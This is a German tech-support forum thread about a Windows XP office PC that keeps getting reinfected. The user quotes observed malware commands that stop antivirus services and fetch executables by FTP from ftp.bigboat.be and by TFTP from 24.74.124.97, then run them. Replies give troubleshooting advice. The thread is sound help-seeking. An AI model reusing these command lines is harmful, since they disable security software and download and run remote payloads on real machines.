Kriege Viren nicht los

[Herbert Leitner 10]

Hallo!

 

Ich habe mir vermutlich einen Virus gefangen.

Plötzlich und von alleine wird eine Eingebebox gestartet und darin diese Befehle ausgeführt:

 

C:\WINXP\systen32>net stop “Security Center“ &net stop navapsvc &net stop kavsvc &net stop McAfeePranework &net stop NOD32krn &net stop McShield &net stop “Symantec AntiVirus“ &net stop “Not rn AntiUirus Server“ &echo open ftp.bigboat.be 2i > i&echo get network.exe >> i &echo quit >> i &ftp —As:i &network.exe &exit

 

ftp> open ftp.bigboat.be 21

Verbindung mit ftp.bigboat.be wurde hergestellt.

220 omg.i.got.hacked.net

331 Password required for anonynous.

230 User anonynous logged in.

Anonyme Anneldung erfolgreich für Adninistrator@leitner—nb

ftp> get network.exe

220 Port connand successful.

150 Opening data connection for network.exe (16384 bytes).

226 Transfer ok

FTP: 64d Bytes empfangen in 1,03Sekunden 15.881(D/s

FTP> quit

 

Hier wird versucht, alle Antivirenprogramme zu stoppen, und dann per FTP eine Datei down geloadet.

Ich habe verschiedene Antivirenprogramme verwendet, alle sagen mir dass ich sauber bin.

Und dann kommt wieder das Fenster. Zum Teil alle paar Minuten, zum Teil irgendwann.

 

Ich habe dann die Festplatte formatiert und komplett neu installiet. Nur Windows, Office und ein paar Tools.

Und irgendwann in den nächsten paar Tagen kam der Virus bzw. das Fesnter wieder.

 

DA gibt es auch eine zweite Variante:

>tftp -i 24.74.124.97 get Symantex.exe& start Symantex.exe& exit

Das ist genau so schlimm, weil die Datei sofort gestartet wird.

 

Ich weiß nicht, wie ich den Virus los krige.

Dei Datei network.exe habe ich bereits mit verschiedenen Antivirenprogrammen geprüft. Auch mit Kaspersky Online. Alle sagen mir, daß ich sauber bin.

So ein Murks!

 

Was kann das sein?

 

tks!

Herbert

[Dr.Melzer 191]

An besten du baust die Platte in einen sauberen Rechner ein und scannst und bereinigst sie so. Alternativ gibt es auch Boot CDs die so etawas könne. Einen verseuchten Rechner von sich selbst aus sauber zu bekommen dürfte aber wenig Erfolg haben.

[SecurityMaker 10]

Hallo,

 

ist dieser rechner in einem Netzwerk? wenn ja sofort den davon kappen. Wie Dr.Melzer schon sagte gibt es spezielle Boot CD´s Knoppicilin wäre da zum empfehlen. War bei einer der letzen CT´s mit dabei. sonst mal im internet danach schau. Oder einen eigene Bart CD erstellen und mit virenscanner vollstopfen und drüber laufen lassen! :)

 

Da du ja formatiert hast und es wieder kam kann es entweder sein das noch irgendwo im netzwerk der virus rumschleicht oder sich in den MBR geschrieben hat. hast den mal gelöscht?

[Herbert Leitner 10]

An besten du baust die Platte in einen sauberen Rechner ein und scannst und bereinigst sie so. Alternativ gibt es auch Boot CDs die so etawas könne. Einen verseuchten Rechner von sich selbst aus sauber zu bekommen dürfte aber wenig Erfolg haben.

 

Hallo!

 

Ja, die Idee ist gut und ich habe das schon mehrmals getan.

 

Ich habe die Platte schin in verschiedene Rechner gesteckt und dort auf Viren geprüft. Rechner, die sicher sauber sind.

Und alle sagenmir, daß auf der Platte kein Virus drauf ist.

Ich habe verwendet: Kaspersky, Trendmicro, Mcafee, und diverse Nischenprodukte wie z.b:

MS-Tool zum entfernen bösartiger Software, Ewido, Ad-Aware, Stinger, Spybor Search & Destroy.

 

Da wird kein Virus gefunden.

DAnn baue ich die Platte wieder ein und fahr damit hoch - und nach ein paar Minten kann ich wieder zusehen, wie die nächtse Datei per FTP vom Internet geholt und ausgefürht wird. Solche Verbrecher!

 

Leider ist das der klassische Beweis, daß keines der Antivirenprogramme wirklich brauchbar ist.

 

Gruß und Dank!

Herbert

[Herbert Leitner 10]

Hallo,

 

ist dieser rechner in einem Netzwerk? wenn ja sofort den davon kappen. Wie Dr.Melzer schon sagte gibt es spezielle Boot CD´s Knoppicilin wäre da zum empfehlen. War bei einer der letzen CT´s mit dabei. sonst mal im internet danach schau. Oder einen eigene Bart CD erstellen und mit virenscanner vollstopfen und drüber laufen lassen! :)

 

Da du ja formatiert hast und es wieder kam kann es entweder sein das noch irgendwo im netzwerk der virus rumschleicht oder sich in den MBR geschrieben hat. hast den mal gelöscht?

 

Hallo!

 

Nein, ich glaub nicht, daß der Virus im MBR ist. Ich kenne keinen, der dazu in der Lage ist, im Betriebssystem eine FTP - Verbindung aufzubauen.

 

Die Idee mit dem Virus im Netzwerk ist gut. Ich denke aber, daß da auch nicht sein kann. Ich habe Windows XP mit SP2 installiert. Da ist die Firewall dabei und auch gleich aktiv. Solange ich also von keinem anderen Rechner was lade und starte, kann kein Virus hierier kommen. Ansosnten habe ich nur Windows, Office und ein paar Tools geladen. Und nach einigen Minuten (oder Stunden, ich weiß nicht mehr) wurde sofort wieder eine FTP Verbindung aufgebaut.

 

Ich habe die Festplatte auch schon in verschiedene Rechner eingebaut, die sicher Virenfrei sind. Und mit denen geprüft, mit diversen Antivirenprogrammen. Alle sagen mir das ich sauber bin. Die irren ganz sicher.

 

Z.B mit TCPView von Sysinternals kann ich prüfen, welche Verbindungen aufgebaut werden und welche stehen. Da sind eine Menge drinnen, Alle entweder von Systemprozess (4) oder von network.exe - die zuvor per ftp vom Internet geladen wurde.

 

So ein Mist!

Herbert

[Volvotrucker 10]

Hast du dir mal mit Hijackthis die laufenden und automatisch startenden Prozesse angekuckt? Irgendwo muss ja einer laufen, der den Transfer startet. Evtl noch in geplante Tasks.

So was ähnliches hat ich mal erlebt, als Kunde Geld sparen wollte und sich eine Version der Corporate XP aus dem Esel gezogen und die installiert hatte. Findige Leutchen hatten wohl die Installationsroutine "umgebaut", so dass gleich ein netter Dienst mit installiert wurde, der ähnliches geladen hat wie bei dir.

Aber ich geh jetzt mal davon aus, dass deine Versionen nicht auszweifelhafter Quelle stammen. Oder?

Auf jeden Fall würd ich die Kiste nimmer ans Netz lassen. Gab es nicht mal nen Wurm, der sich über Netzwerkfreigaben repliziert hat? Komm grad nimmer auf den Namen.

[grizzly999 11]

Dei Datei network.exe habe ich bereits mit verschiedenen Antivirenprogrammen geprüft. Auch mit Kaspersky Online. Alle sagen mir, daß ich sauber bin.

So ein Murks!

 

Was kann das sein?

 

Hallo Herbert, hatten wir das nicht erst neulich auf einem deiner Rechner und den Thread dazu? Einen Virus, und die Empfehlung aller Experts hier war, plattmachen und neu

aufsetzen.

 

Nun siehst du wieso ;)

 

Leider ist das der klassische Beweis, daß keines der Antivirenprogramme wirklich brauchbar ist.

Das kann man so nicht sagen, aber wie du weißt, sind Antivirenprogramme immer nur Reaktionen auf bekannte Viren. Unbekannte Viren oder mutierte Versionen, das sagen alle Antivirenprogrammhersteller: Vielleicht, vielleicht auch nicht, eher nicht.

 

Ich habe nur dieselbe Empfehlung wie neulich: Mache den Rechner platt und setze neu auf

 

Gruß

 

grizzly999

[*Cat* 19]

wink

 

seh ich auch so

zumal ich denke, dass das im klassischen sinne kein virus ist

schließlich connected der nur via ftp und lädt eine datei runter

ich denke nicht, dass das aufgabe eines scanners ist sowas zu verhindern

[Dr.Melzer 191]

Leider ist das der klassische Beweis, daß keines der Antivirenprogramme wirklich brauchbar ist.

 

Ich sehe das eher als Beweis dafür an dass es eine ganze Menge Leute gibt die selbst mit dem Einsatz von Virenscannern überfordert sind...

 

Wenn du die Festplattze formatiert hast und das BS komplett neu installiert und trotzdem hattest du den Virus nach kurzer Zeit wieder drauf, ist da mehr faul in deinem Netzt.

 

Ich empfehle dir da mal Profis drauf schauen zu lassen, anstatt selbst daran rumzupfuschen. In den gelben Seiten findest du die Jungs die sich mit so etwas auskennen.

 

Es ist aber immer leichter auf die anderen zu schimpfen als den Fehler bei sich selbst zu suchen.

 

Meine Oma hat immer gesagt:

 

"Wenn du mit einem Finger auf jemanden zeigst, zeigen vier Finger auf dich selbst."

 

Denk mal darüber nach...

[XP-Fan 215]

Hallo Herbert,

 

Thema Rootkit schon abgehandelt ?

Ich denke eher das du damit ein Problem hast.

Einzigst vernünftigte Lösung in meinen Augen:

 

Siehe Vorredner : Einmal Neu

[SecurityMaker 10]

Hi,

 

1. Es gibt einige Viren die sich in den MBR schreiben oder sogar in der lage sind einen eigenen Boot Loader herzustellen.

 

2. Das was deine aussage betrifft das es nicht sein kann das es über dein Netzwerk kommt würde ich nochmal überdenken. C:\WINXP\systen32>net stop “Security Center“ du siehst das der Virus auch dort dasSecurity Center ausser kraft setzt und somit ist auch die interne Firewall von XP SP2 weg auch wenn es so ausseiht das sie aktiviert ist.

 

Nach ein bischen suchen könnte dein "Virus" ein derivat vom Bagle.f sein. Wie ich schon empfholen hab. Die kiste komplett von Netzwerk und Internet abklämmen. Alle Netzwerkrechner untersuchen, und die betroffen kiste mal mit Hijackthis wie meine vorredner schon empfohlen haben zu scannen und dann mit einer Viren Boot CD durchscannen. Komplett formatieren und am besten mit Low Level Format und wieder neu installieren. An sonsten wie Dr. Meltzer schon gesagt hat Experten hinzu ziehn.

 

Falls du Orginal Anti-Viren Software benutzt.. zieh den Support hinzu. die können dir auch helfen.

[psymon 10]

hallo

 

wie sieht dein Netzwerk aus, hinterm router oder direkt per Modem?

laufen noch andere Rechner im Netzwerk die gegebenenfalls die Infektionsherde sein könnten?

wenn router, irgendwelche Ports geroutet?

per knoppix auf viren gescannt? ( Knopper.Net Consulting )

netwzerkmitschnitt zb mit ethereal/wireshark?

Schlagwort rpc dcom exploit (isses nun gepatscht? bin nicht aufm neusten stand)

gegebenenfalls firewall policies anpassen.

 

 

psymon

[Herbert Leitner 10]

..und die Empfehlung aller Experts hier war, plattmachen und neu

aufsetzen.

Nun siehst du wieso ;)

 

@grizzly999:

Ja, ich hatte das Problem bereits und hier die Frage auch gestellt. Allerdings war in der Zwischenzeit alles in Ordnung und ich dachte, daß der Virus weg ist.

 

Es gab dann zwei Gründe, warum ich mich noch mal gemeldet hatte:

1.) Ein anderer Virus oder ein anderes Verhalten/Vorgehen des betreffenden Viruses

2.) Ich hatte in der Zwischenzeit neu installiert (Original Windows XPSP2), mit ein paar Programme die ich brauche (Office, Visio, Fernwartung, ...). Und nach ein paar Stunden hatte ich wieder (mit entsetzen) festgestellt, daß sich die Maschine schon wieder in das Internet verbindet, von dort eine Datei lädt und gleich startet.

 

Das ist auch einer der Gründe, warum es mir meist wiederstrebt, gleich neu zu installieren. Ich hatte nur eine Menge Arbeiten und doch wieder einen Virus. Weiß der Kuckuck, wo der hergekommen ist. Ich find den einfach nicht.

 

Windows, Office und Visio ist original von Microsoft, die können nicht verseucht sein!

 

PS: grizzly, ich bin immer wieder überrascht. Meist treffen deine Infos die Sache auf den Punkt (ausgezeichnete Auffassungsgabe), auch Dein Gedächnis scheint gut zu funktionieren.

 

Gruß und Dank!

Herbert

[Herbert Leitner 10]

hallo

 

wie sieht dein Netzwerk aus, hinterm router oder direkt per Modem?

laufen noch andere Rechner im Netzwerk die gegebenenfalls die Infektionsherde sein könnten?

wenn router, irgendwelche Ports geroutet?

per knoppix auf viren gescannt? ( Knopper.Net Consulting )

netwzerkmitschnitt zb mit ethereal/wireshark?

Schlagwort rpc dcom exploit (isses nun gepatscht? bin nicht aufm neusten stand)

gegebenenfalls firewall policies anpassen.

 

psymon

 

Hallo!

 

Ja, da ist eine Firewall, ich bin im Netzwerk dahinter. Da stehene 4 Rechner, da ist aber nicht viel drauf. Nur was man so im Büro braucht: Office, Visio, Fakturierung, TelefonCD, Fernwartung (VNC), ...

Von außen ist nur der Port 5900 geforwardet, auf eine der Maschinen.

Da ich nach der Installation sofort die Updates habe, sind mir die rpc dcom exploit egal (denke ich).

 

Weiß der Kuckuck, wo die Viren hergekommen sind!

 

Gruß und Dank!

herbert

[schotte 10]

Hallo,

 

bei Viren ist immer zu beachte:

Computersicherheit - Kompromittierung

 

MfG Schotte